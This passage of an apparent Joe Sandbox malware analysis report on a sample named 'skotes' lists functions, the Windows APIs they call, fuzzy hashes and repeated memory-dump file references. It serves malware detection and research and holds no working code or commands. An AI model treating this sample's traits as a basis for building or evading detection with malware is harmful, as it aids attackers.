Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5e63cf968ad933a08624f0a160c92fa4810296f69e0158a5c57d2b98c4bcd60f
Instruction ID: a6e46b67160d1c5dca39718bca42a810dc5bd8ee4fdceb1bcb1ce72906b3b1a8
Opcode Fuzzy Hash: 5e63cf968ad933a08624f0a160c92fa4810296f69e0158a5c57d2b98c4bcd60f
Instruction Fuzzy Hash: 5AE086683A8344D6FA20B26A688DB2D7299DFD6B10F310414E604C6092C6F055848537

Function 00BF6D00 Relevance: 3.0, APIs: 2, Instructions: 14sleepthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00BF6D11
Sleep.KERNELBASE(00007530), ref: 00BF6D25

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateSleepThread
String ID:
API String ID: 4202482776-0
Opcode ID: 9c21508f83b0d2444f5ca2c84198c4cd05fac05349077c440c8d39d1150b60dd
Instruction ID: 1cb4ee9533058f8797712816bac2a75f9356ffa5a9788f6365ddedec4790a2c6
Opcode Fuzzy Hash: 9c21508f83b0d2444f5ca2c84198c4cd05fac05349077c440c8d39d1150b60dd
Instruction Fuzzy Hash: 92D08C357E0318B6F12007202C0BF3AAF90DB0AF01F350880B7483F0E0C2E030044B98

Function 00BE8380 Relevance: 1.7, APIs: 1, Instructions: 159COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BE8524

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: ec14f34b6ddf5278b452c3b41b35a4b5c45d0024e2e04571552a943a45e2a483
Instruction ID: 812207a2c7180782f69257f7730e0b67186f169839060e1c90b85b998561304d
Opcode Fuzzy Hash: ec14f34b6ddf5278b452c3b41b35a4b5c45d0024e2e04571552a943a45e2a483
Instruction Fuzzy Hash: 5651F670D106989BDB24EB69CD89BEDB7F5EB45310F5042E8E409A73C1EF349E848B91

Function 00C16E4C Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00def815d9c199bc7bcdd020a7c593b15fa9d9d0c33108a2c15b96376ea7c5ed
Instruction ID: 0e3db9084cdeb5b83a85b062cc8b742dafb6584dc126aeb66251b8c5bb2c1914
Opcode Fuzzy Hash: 00def815d9c199bc7bcdd020a7c593b15fa9d9d0c33108a2c15b96376ea7c5ed
Instruction Fuzzy Hash: A021D672905208ABEB11ABA89C46BEF7729DF43374F200355F9342B1C1DB709E46B6A1

Function 00C17124 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,00C1705B,?,?,00000000,00000000), ref: 00C17166

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: db21d8dc8ee8b5ed84d4deeb07005a73d648c6eeccaa3524a2d26bf440ce25fb
Instruction ID: a58922748d64117f701444b0146fcb99b457ad89bafddfd54c94df9fd5499003
Opcode Fuzzy Hash: db21d8dc8ee8b5ed84d4deeb07005a73d648c6eeccaa3524a2d26bf440ce25fb
Instruction Fuzzy Hash: CF11067290410CBADF10DED5C985ADFB7BCAF09310F605262E526E2180EB30EB89DB61

Function 00BF6C70 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE ref: 00BF6CF5

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
